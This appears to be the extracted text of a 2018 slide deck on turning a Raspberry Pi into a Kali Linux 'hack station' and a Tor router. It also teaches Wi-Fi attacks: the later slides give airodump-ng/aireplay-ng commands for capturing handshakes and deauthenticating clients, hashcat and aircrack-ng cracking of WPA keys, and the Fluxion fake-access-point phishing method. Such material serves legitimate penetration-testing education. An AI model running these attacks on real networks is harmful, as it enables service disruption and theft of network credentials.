  • 4. What is the Raspberry Pi? ✓ A low cost, credit-card sized computer ✓ Small computer that can communicate with outside world (Internet) ✓ Cost effective computer ✓ Use standard keyboard & mouse , plugs into monitor or TV Thursday, June 21, 2018 4
  • 5. Raspberry Pi Hardware ✓ 64-bit quad core ARM Cortex A53 clocked at 1.2 GHz processor ✓ 1 GB RAM LPDDR2-900 ✓ Videocore IV GPU ✓ On-board 802.11n WiFi ✓ Bluetooth 4.0 ✓ Ethernet 10/100 ✓ Video Output – HDMI ✓ Storage micro-SD ✓ 40 pin GPIO ✓ 4 USB Ports ✓ CSI Camera Port 5
  • 6. Raspberry Pi Kit Thursday, June 21, 2018 6
  • 7. What do I support ??? Thursday, June 21, 2018 7
  • 8. Basic Hack Station Setup Steps to install KALI Linux NEXMON ✓ Download KALI (https://www.offensive- security.com/kali-linux-arm-images/) ✓ Install Win32DiskImager ✓ Connect SD Card to computer ✓ Write image to SD Card using Win32Diskimager ✓ Good to Go ✓ Verify Installation by connecting RSPI in your network Namp –sn 192.168.0.1/24 ssh root@192.168.0.125 ✓ Update & Upgrade to latest version apt-get update apt-get upgrade Thursday, June 21, 2018 8
  • 9. Hack Station Configuration ✓ Resize FS to utilize SD Card Install tightvncserver Apt-get install tightvncserver Install gparted : Rezsize the file system Steps to configure Access Point on RASPI ✓ Install hostapd &isc-dhcp-server Hotapd :HostAPD is a user space daemon for access point and authentication servers. apt-get install hostapd isc-dhcp-server : DHCP Server for access point apt-get install isc-dhcp-server ✓ Configure DHCP Server ✓ Modify configuration file vim /etc/dhcp/dhcpd.conf ✓ #option domain-name ✓ #option domain-name-servers ✓ authoritative; ✓ subnet 192.168.42.0 netmask 255.255.255.0 { range 192.168.42.10 192.168.42.50; option broadcast-address 192.168.42.255; option routers 192.168.42.1; default-lease-time 600; max-lease-time 7200; Thursday, June 21, 2018 9
  • 10. Hack Station Configuration ✓ Configure DHCP Server ✓ Edit default DHCP Config file to ✓ INTERFACES="wlan0“ ✓ Turn off wireless interface ✓ ifdown wlan0 ✓ Assign Static IP to Wireless Interface ✓ Vim /etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet dhcp allow-hotplug wlan0 iface wlan0 inet static address 192.168.42.1 netmask 255.255.255.0 ✓ Assign IP Address to wireless interface ✓ ifconfig wlan0 192.168.42.1 Thursday, June 21, 2018 10
  • 11. Hack Station Configuration ✓ Configure Hostapd ✓ Edit Configuration file /etc/hostapd/hostapd.conf interface=wlan0 #driver=rtl871xdrv ssid=TORNet country_code=US hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=Raspberry wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP wpa_group_rekey=86400 ieee80211n=1 wme_enabled=1 Thursday, June 21, 2018 11
  • 12. Hack Station Configuration ✓Configure Hostpad ✓ Edit Default config files /etc/default/hostapd DAEMON_CONF="/etc/hostapd/hostapd.conf" ✓ Edit /etc/sysctl.conf net.ipv4.ip_forward=1 ✓ Save and Flush iptables rules (Not mandatory) sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward" iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT sh -c "iptables-save > /etc/iptables/rules.v4" BUG : Kali Nexmon has bug in wifi driver you must bring up monitor interface before starting hostapd iw phy phy0 interface add mon0 type monitor && ifconfig mon0 up ✓ Start Services and enable them at startup service hostapd start service isc-dhcp-server start update-rc.d hostapd enable update-rc.d isc-dhcp-server enable Thursday, June 21, 2018 12
  • 13. Hack Station Configuration ✓Configure SSH Interface ✓ Vim /etc/ssh/sshd_config ✓ Modify ListenAddress to wlan0 Interface address in this case 192.168.42.1 Thursday, June 21, 2018 13
  • 14. Hack Station Use Cases ✓ Red Teaming ✓ Pocket Computer ✓ Network Penetration Testing ✓ Social Engineering Attack ✓ …..Contd Thursday, June 21, 2018 14
  • 16. Thursday, June 21, 2018 16 Raspberry Pi 3 TOR Switch
  • 17. TOR-PI Setup Thursday, June 21, 2018 17 Steps to install KALI Linux NEXMON ✓ Download KALI (https://www.offensive-security.com/kali-linux-arm-images/) ✓ Install Win32DiskImager ✓ Connect SD Card to computer ✓ Write image to SD Card using Win32Diskimager ✓ Good to Go ✓ Verify Installation by connecting RSPI in your network Namp –sn 192.168.0.1/24 ssh root@192.168.0.125 ✓ Update & Upgrade to latest version apt-get update apt-get upgrade ✓ Setup hostapd and isc-dhcp-server as demonstrated in previous slides.
  • 18. TOR-PI Configuration ✓Install TOR ✓ apt-get update ✓ apt-get install tor ✓Edit TOR Configuration File ✓Vim /etc/tor/torrc Log notice file /var/log/tor/notices.log VirtualAddrNetwork 10.192.0.0/10 AutomapHostsSuffixes .onion,.exit AutomapHostsOnResolve 1 TransPort 9040 TransListenAddress 192.168.42.1 DNSPort 53 DNSListenAddress 192.168.42.1 Thursday, June 21, 2018 18
  • 19. ✓ Setup Iptables to route traffic iptables -F iptables -t nat -F iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22 iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 53 iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040 iptables -t nat -L sh -c "iptables-save > /etc/iptables.ipv4.nat“ ✓ Create log files touch /var/log/tor/notices.log chown debian-tor /var/log/tor/notices.log chmod 644 /var/log/tor/notices.log ✓ Start TOR Services service tor start service tor status update-rc.d tor enable Thursday, June 21, 2018 19 TOR-PI Configuration
  • 20. TOR-PI Use Cases Anonymous Browsing Hide online traces Deep Web / Dark Web Market Access TOR Relays Thursday, June 21, 2018 20
  • 22. Wi-Fi Hacking Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. All we need is raspberry pi and wireless network interface capable of packet injection which supports usage in promiscuous (monitoring) mode. Raspberry Pi 3 Raspberry + Alpha Card Thursday, June 21, 2018 22
  • 23. Wi-Fi Security Target Protocols WEP : Wired Equivalent Privacy WPA /WPA2 : Wi-Fi Procted Access Thursday, June 21, 2018 23
  • 24. Wi-Fi Attack Tools Aircrack-ng airmon-ng : Converts our wireless card into a promiscuous mode wireless card airodump-ng : Capture packets of our specification airplay-ng : Aireplay-ng is another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP. Aircrack-ng Used to crack captured hashesh. Thursday, June 21, 2018 24
  • 25. Wi-Fi Attack Tools Commands ✓ List network interface and there mode ✓ iwconfig ✓ #Enable monitor mode on wlan0 ✓ airmon-ng start wlan0 ✓ Sniffing wifi packets , LIST ALL NEARBY STATIONS ✓ airodump-ng WLAN0MON ✓ #Scan particular station for clients and capture handshake ✓ airodump-ng wlan0mon --bssid C8:3A:35:37:BA:18 --channel 11 -- write test ✓ #Deauth all the clients from wifi ✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 wlan0mon ✓ Deauth specific client the clients from wifi ✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 -c 48:88:CA:E9:83:0D wlan0mon ✓ Password cracking Thursday, June 21, 2018 25
  • 26. Password Cracking using GPU Hashcat & Aircrack-ng ✓ Password cracking using aircrack-ng ✓ aircrack-ng -w Wifidictionary --bssid 50:C7:BF:79:4A:3A File.cap ✓ Password Cracking using Hashcat ✓ Convert *.cap file into hccapx ✓ Online ✓ Converter :https://hashcat.net/cap2hccapx/ ✓ Offline ✓ Tool :https://github.com/hashcat/hashcat-utils ✓ Cracking ✓ Dictionary attack ✓ hashcat.exe -m 2500 capture.hccapx rockyou.txt ✓ Brute-Force attack ✓ hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d ✓ Rule-based attack ✓ hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt Thursday, June 21, 2018 26
  • 28. Wi-Fi Social Engineering Attack Fluxion Fluxion is a security auditing and social-engineering research tool. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Compatible with the latest release of Kali (rolling). Thursday, June 21, 2018 28
  • 29. How it works ? ✓Scan the networks. ✓Capture a handshake ✓Launch a Fake AP instance ✓ Fake Use WEB Interface ✓Fake DNS Server ✓Deauth users ✓Captive portals Thursday, June 21, 2018 29
  • 30. Wi-Fi Social Engineering Attack Fluxion Thursday, June 21, 2018 30
  • 31. Thursday, June 21, 2018 31 Demo